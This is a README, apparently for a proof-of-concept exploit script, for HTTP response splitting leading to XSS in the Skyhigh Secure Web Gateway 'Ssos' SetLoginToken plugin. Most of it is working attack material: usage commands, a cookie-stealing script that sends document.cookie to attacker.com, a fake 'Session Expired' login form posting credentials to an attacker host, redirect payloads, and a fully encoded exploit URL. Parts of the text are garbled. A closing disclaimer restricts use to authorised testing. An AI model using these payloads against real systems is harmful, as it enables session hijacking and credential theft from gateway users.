
Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS)
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝ ██║ ███████╗
████╔╝██║██╔═══╝ ██║ ╚════██║
╚██████╔╝██║ ██║ ███████║
╚═════╝ ╚═╝ ╚═╝ ╚══════╝
by 0PTS
Proof of Concept per la vulnerabilità HTTP Response Splitting in Skyhigh Secure Web Gateway (ex McAfee Web Gateway).
Vulnerabilità critica di HTTP Response Splitting in Skyhigh Secure Web Gateway, che consente di eseguire attacchi XSS a distanza tramite iniezione di codice HTML/JavaScript arbitrario.
La vulnerabilità si trova nel plugin "Ssos" (azione SetLoginToken), che gestisce in modo errato i parametri URL:
Poiché i caratteri di nuova riga (\r\n / %0d%0a) non vengono escaped, un attaccante può:
Content-Type e Content-LengthIl browser ignora il resto del contenuto della risposta dopo un Content-Length correttamente formato, consentendo di sostituire completamente il contenuto visualizzato.
python explot.py
# Базовый XSS
python explot.py -d example.com -p "<script>alert(document.domain)</script>"
# Редирект
python explot.py -d target.com -p '<meta http-equiv="refresh" content="0;url=https://evil.com/">'
# Фишинг форма
python explot.py -d bank.com -p '<form action="https://evil.com/steal"><input name="pass" placeholder="Password"><button>Login</button></form>'
# Только URL (тихий режим)
python explot.py -d example.com -p "<script>alert(1)</script>" -q
-d, --domain Dominio target (predefinito: google.com)
-x, --prefix Prefisso del percorso URL (predefinito: SWG internal path)
-p, --payload HTML/JavaScript payload
-q, --quiet Modalità silenziosa - solo URL
-v, --version Versione dello script
-h, --help Aiuto
<script>fetch('https://attacker.com/log?c='+document.cookie)</script>
<html>
<body style="font-family:Arial">
<h2>Session Expired - Please Login Again</h2>
<form action="https://attacker.com/phish" method="POST">
<input type="text" name="user" placeholder="Username"><br>
<input type="password" name="pass" placeholder="Password"><br>
<button>Login</button>
</form>
</body>
</html>
<meta http-equiv="refresh" content="0;url=https://malicious-site.com/">
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝ ██║ ███████╗
████╔╝██║██╔═══╝ ██║ ╚════██║
╚██████╔╝██║ ██║ ███████║
╚═════╝ ╚═╝ ╚═╝ ╚══════╝
[+] Target Domain: example.com
[+] Payload Length: 43 bytes
[+] URL Length: 234 chars
[+] Generated URL:
http://example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=1&c=1&p=p%0D%0AContent-Type%3A%20text%2Fhtml%3Bcharset%3Dutf-8%0D%0AContent-Length%3A%2043%0D%0A%0D%0A%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/mwg-internal/*⚠️ ATTENZIONE: Questo strumento è destinato esclusivamente a:
L'utilizzo contro sistemi senza esplicita autorizzazione del proprietario è illegale.
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝ ██║ ███████╗
████╔╝██║██╔═══╝ ██║ ╚════██║
╚██████╔╝██║ ██║ ███████║
╚═════╝ ╚═╝ ╚═╝ ╚══════╝